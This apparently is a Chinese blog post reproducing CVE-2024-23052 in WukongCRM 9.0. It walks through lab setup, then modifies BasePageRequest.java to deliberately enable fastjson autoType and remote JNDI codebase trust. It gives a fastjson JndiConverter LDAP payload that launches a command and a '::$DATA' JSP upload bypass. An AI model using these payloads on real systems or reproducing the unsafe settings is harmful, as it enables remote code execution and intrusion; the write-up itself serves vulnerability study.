摘要:记录一下CVE-2024-23052复现过程,相当曲折。这个CVE利用条件比较苛刻,基本没啥用。

复现环境搭建

软件版本

os system:Windows Server 2022 Datacenter 21H2

wukongcrm v.72crm_9.0.1_20191202:下载地址

jdk-8u102-windows-x64.exe:下载地址

注意jdk版本很重要。因为8u113之后,系统属性com.sun.jndi.rmi.object.trustURLCodebasecom.sun.jndi.cosnaming.object.trustURLCodebase的默认值变为false,即默认不允许Rmi、Cosnaming从远程的Codebase加载Reference工厂类。
apache-tomcat-9.0.89:下载地址

mysql 5.7.26:小皮面板
redis 3.0.503:小皮面板
apache-maven-3.8.4-bin.zip:下载地址

mysql配置

src\\main\\resources\\config\\crm9-config.txt 修改为一下内容:

mysql.jdbcUrl = jdbc:mysql://127.0.0.1:3306/crm20190923?characterEncoding=utf8&useSSL=false&zeroDateTimeBehavior=convertToNull&tinyInt1isBit=false
mysql.user = root
mysql.password = ADHGBNHG@112
jfinal.devMode = true

然后在mysql中修改root用户密码为ADHGBNHG@112。之后创建一个名为crm20190923的数据库,字符集选择utf8mb4。然后将源码根目录\\docs\\crm9.sql导入crm20190923即可。

redis配置

在小皮面板中修改redis密码为123456。

CVE-2024-23052复现1.png

环境变量

上面软件自行下载并安装后,按照下面配置环境变量。

(1)高级系统设置->环境变量->系统变量 分别新增下列项

变量:JAVA_HOME 
值:C:\Program Files\Java\jdk1.8.0_102

变量:MAVEN_HOME 
值:E:\apache-maven-3.8.4

变量:MYSQL_HOME 
值:E:\phpstudy_pro\Extensions\MySQL5.7.26\bin

变量:TOMCAT_HOME 
值:E:\apache-tomcat-9.0.89

(2)高级环境设置->环境变量->系统变量->Path 分别增加下列项:

值:%JAVA_HOME%\bin
值:%MYSQL_HOME%\bin
值:%MAVEN_HOME%\bin
值:%TOMCAT_HOME%\bin

CVE-2024-23052复现2.png

maven配置

apache-maven-3.8.4-bin.zip解压后,将 conf\\settings.xml 文件内容修改如下:

<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">
    <mirrors>
        <!-- mirror
         | Specifies a repository mirror site to use instead of a given repository. The repository that
         | this mirror serves has an ID that matches the mirrorOf element of this mirror. IDs are used
         | for inheritance and direct lookup purposes, and must be unique across the set of mirrors.
         |
        <mirror>
          <id>mirrorId</id>
          <mirrorOf>repositoryId</mirrorOf>
          <name>Human Readable Name for this Mirror.</name>
          <url>http://my.repository.com/repo/path</url>
        </mirror>
         -->
 
        <mirror>
            <id>alimaven</id>
            <name>aliyun maven</name>
            <url>http://maven.aliyun.com/nexus/content/groups/public/</url>
            <mirrorOf>central</mirrorOf>
        </mirror>
 
        <mirror>
            <id>uk</id>
            <mirrorOf>central</mirrorOf>
            <name>Human Readable Name for this Mirror.</name>
            <url>http://uk.maven.org/maven2/</url>
        </mirror>
 
        <mirror>
            <id>CN</id>
            <name>OSChina Central</name>
            <url>http://maven.oschina.net/content/groups/public/</url>
            <mirrorOf>central</mirrorOf>
        </mirror>
 
        <mirror>
            <id>nexus</id>
            <name>internal nexus repository</name>
            <!-- <url>http://192.168.1.100:8081/nexus/content/groups/public/</url>-->
            <url>http://repo.maven.apache.org/maven2</url>
            <mirrorOf>central</mirrorOf>
        </mirror>
 
    </mirrors>
</settings>

wukongcrm配置

pom.xml

源码根目录\\pom.xml 文件改为下面内容:

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.kakarote</groupId>
    <artifactId>crm9</artifactId>
    <packaging>war</packaging>
    <version>1.3.3</version>
    <name>crm9-master</name>

    <properties>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
        <maven.compiler.encoding>UTF-8</maven.compiler.encoding>
    </properties>

    <!-- 使用阿里 maven 库 -->
    <repositories>
        <repository>
            <id>ali-maven</id>
            <url>http://maven.aliyun.com/nexus/content/groups/public</url>
            <releases>
                <enabled>true</enabled>
            </releases>
            <snapshots>
                <enabled>true</enabled>
                <updatePolicy>always</updatePolicy>
                <checksumPolicy>fail</checksumPolicy>
            </snapshots>
        </repository>
    </repositories>

    <dependencies>
        <!--<dependency>-->
            <!--<groupId>com.jfinal</groupId>-->
            <!--<artifactId>jfinal-undertow</artifactId>-->
            <!--<version>1.9</version>-->
        <!--</dependency>-->
        <dependency>
            <groupId>javax.servlet</groupId>
            <artifactId>javax.servlet-api</artifactId>
            <version>4.0.1</version>
            <scope>provided</scope>
        </dependency>
        <dependency>
            <groupId>com.jfinal</groupId>
            <artifactId>jfinal</artifactId>
            <version>3.8</version>
        </dependency>
        <dependency>
            <groupId>cglib</groupId>
            <artifactId>cglib-nodep</artifactId>
            <version>3.2.5</version>
        </dependency>

        <dependency>
            <groupId>com.jfinal</groupId>
            <artifactId>cos</artifactId>
            <version>2019.8</version>
        </dependency>
        <dependency>
            <groupId>it.sauronsoftware.cron4j</groupId>
            <artifactId>cron4j</artifactId>
            <version>2.2.5</version>
        </dependency>
        <dependency>
            <groupId>redis.clients</groupId>
            <artifactId>jedis</artifactId>
            <version>2.9.0</version>
        </dependency>
        <dependency>
            <groupId>de.ruedigermoeller</groupId>
            <artifactId>fst</artifactId>
            <version>2.50</version>
        </dependency>
        <dependency>
            <groupId>org.slf4j</groupId>
            <artifactId>slf4j-nop</artifactId>
            <version>1.7.25</version>
            <scope>compile</scope>
        </dependency>
        <dependency>
            <groupId>log4j</groupId>
            <artifactId>log4j</artifactId>
            <version>1.2.16</version>
        </dependency>
        <dependency>
            <groupId>mysql</groupId>
            <artifactId>mysql-connector-java</artifactId>
            <version>5.1.44</version>
        </dependency>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>druid</artifactId>
            <version>1.0.29</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/com.alibaba/fastjson -->
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.54</version>
        </dependency>
        <dependency>
            <groupId>cn.hutool</groupId>
            <artifactId>hutool-all</artifactId>
            <version>4.4.0</version>
        </dependency>

        <dependency>
            <groupId>org.apache.poi</groupId>
            <artifactId>poi-ooxml</artifactId>
            <version>3.17</version>
        </dependency>
        <dependency>
            <groupId>com.aliyun</groupId>
            <artifactId>aliyun-java-sdk-core</artifactId>
            <version>4.0.6</version>
        </dependency>
        <dependency>
            <groupId>com.aliyun</groupId>
            <artifactId>aliyun-java-sdk-dysmsapi</artifactId>
            <version>1.1.0</version>
        </dependency>
        <dependency>
            <groupId>com.github.ben-manes.caffeine</groupId>
            <artifactId>caffeine</artifactId>
            <version>2.6.2</version>
        </dependency>
<!-- https://mvnrepository.com/artifact/org.apache.xbean/xbean-reflect -->
<dependency>
    <groupId>org.apache.xbean</groupId>
    <artifactId>xbean-reflect</artifactId>
    <version>4.15</version>
</dependency>

    </dependencies>

    <build>
        <finalName>ROOT</finalName>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <version>3.6.1</version>
                <configuration>
                    <source>1.8</source>
                    <target>1.8</target>
                    <encoding>UTF-8</encoding>
                    <!-- java8 保留参数名编译参数 -->
                    <compilerArgument>-parameters</compilerArgument>
                    <compilerArguments>
                        <verbose/>
                    </compilerArguments>
                </configuration>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-assembly-plugin</artifactId>
                <version>3.1.0</version>
                <executions>
                    <execution>
                        <id>make-assembly</id>
                        <phase>package</phase>
                        <goals>
                            <goal>single</goal>
                        </goals>
                        <configuration>
                            <finalName>${project.artifactId}</finalName>
                            <recompressZippedFiles>false</recompressZippedFiles>
                            <appendAssemblyId>true</appendAssemblyId>
                            <descriptors>
                                <descriptor>package.xml</descriptor>
                            </descriptors>
                            <!-- 打包结果输出的基础目录 -->
                            <outputDirectory>${project.build.directory}/</outputDirectory>
                        </configuration>
                    </execution>
                </executions>
            </plugin>
        </plugins>
    </build>
</project>

Application.java

源码根目录\\src\\main\\java\\com\\kakarote\\crm9\\Application.java 修改为下面内容

package com.kakarote.crm9;
/*
import com.jfinal.server.undertow.UndertowConfig;
import com.jfinal.server.undertow.UndertowServer;
import com.kakarote.crm9.common.config.JfinalConfig;
import com.kakarote.crm9.common.constant.BaseConstant;


public class Application {
    public static void main(String[] args) {
        UndertowConfig config=new UndertowConfig(JfinalConfig.class,"config/undertow.txt");
        config.setResourcePath("src/main/webapp,"+ BaseConstant.UPLOAD_PATH);
        config.setServerName(BaseConstant.NAME);
        UndertowServer.create(config).start();
    }
}
*/

BasePageRequest.java

源码根目录\\src\\main\\java\\com\\kakarote\\crm9\\common\\config\\paragetter\\BasePageRequest.java 改为下面内容:

package com.kakarote.crm9.common.config.paragetter;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.util.TypeUtils;
import com.jfinal.kit.Kv;
import com.alibaba.fastjson.parser.ParserConfig;
/**
 * 通用分页插件
 * date 2019年1月28日18:06:10
 *
 * @param <T>
 * @author zhangzhiwei
 */
public class BasePageRequest<T> {
    /**
     * 页数 默认1
     */
    private int page;
    /**
     * 每页条数 默认10
     */
    private int limit;
    /**
     * 数据对象
     */
    private T data;
    /**
     * 分页类型
     */
    private Integer pageType;

    private JSONObject jsonObject;


    @Deprecated
    public BasePageRequest(int page, int limit) {
        this.page = page;
        this.limit = limit;
    }

    public BasePageRequest(Kv kv,Class<T> clazz) {
        this(kv.toJson(),clazz);
    }

    public BasePageRequest(String rowData,Class<T> clazz) {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        JSONObject jsonObject = JSON.parseObject(rowData);
        this.setJsonObject(jsonObject);
        this.setPage(getIntAndRemove("page", 1));
        this.setLimit(getIntAndRemove("limit", 10));
        this.setPageType(getIntAndRemove("pageType", 1));
        if(clazz!=null){
            this.setData(jsonObject.toJavaObject(clazz));
        }
    }

    public int getPage() {
        return page;
    }

    private void setPage(int page) {
        this.page = page;
    }

    public int getLimit() {
        return limit;
    }

    private void setLimit(int limit) {
        this.limit = limit;
    }

    public JSONObject getJsonObject() {
        return jsonObject;
    }

    public BasePageRequest<T> setJsonObject(JSONObject jsonObject) {
        this.jsonObject = jsonObject;
        return this;
    }

    public T getData() {
        return data;
    }

    public void setData(T data) {
        this.data = data;
    }

    public Integer getPageType() {
        return pageType;
    }

    public BasePageRequest<T> setPageType(Integer pageType) {
        this.pageType = pageType;
        return this;
    }

    private Integer getIntAndRemove(String key, Object defaultValue) {
        if (this.getJsonObject() == null) {
            throw new RuntimeException("jsonObject cannot be null");
        }
        Object obj = jsonObject.getOrDefault(key, defaultValue);
        jsonObject.remove(key);
        return TypeUtils.castToInt(obj);
    }
}

部署crm

源码根目录下运行 mvn claen package命令,

然后将源码根目录\\target\\ROOT.war文件复制到E:\\apache-tomcat-9.0.89\\webapps文件夹下面。

之后运行E:\\apache-tomcat-9.0.89\\bin\\startup.bat文件,即可启动tomcat。

如果遇到命令行崩溃自动退出的情况,重启电脑

crm登录地址为:http://127.0.0.1:8080/index.html
账户名为:admin,密码为:123456。

CVE-2024-23052复现3.png

命令执行复现

不需要登录即可执行命令。但是环境要求苛刻,很鸡肋。

exp如下:

POST /CrmCustomer/queryPageList HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=UTF-8
Content-Length: 117
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/index.html

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://127.0.0.1:4445/Basic/Command/calc"}

可以看出桌面弹出了计算器。

CVE-2024-23052复现4.png

文件上传复现

需要管理员登录才能执行命令,更鸡肋。使用::$DATA进行文件上传绕过

exp如下:
第一步:上传文件

POST /sysConfig/setSysConfig HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Length: 403
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/index.html
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjUVXJ3PslTEBh9as
Admin-Token: ea18f1de282e4168b44a13f2b10bd984

------WebKitFormBoundaryjUVXJ3PslTEBh9as
Content-Disposition: form-data; name="name"

rwat
------WebKitFormBoundaryjUVXJ3PslTEBh9as
Content-Disposition: form-data; name="param2"

123456
------WebKitFormBoundaryjUVXJ3PslTEBh9as
Content-Disposition: form-data; name="file"; filename="test.jsp::$DATA"
Content-Type: image/png

<%= "Hello JSP!" %>
------WebKitFormBoundaryjUVXJ3PslTEBh9as--

查看文件上传目录,发现文件已经上传。

CVE-2024-23052复现5.png

第二步:查询上传文件url

exp如下:

GET /sysConfig/querySysConfig HTTP/1.1
Host: 127.0.0.1:8080
Connection: close

得到文件上传路径为:http://127.0.0.1:8080/upload/20240610/test.jsp

CVE-2024-23052复现6.png

第三步:访问文件url

CVE-2024-23052复现7.png

相关参考

WukongCRM_9.0.md

文章目录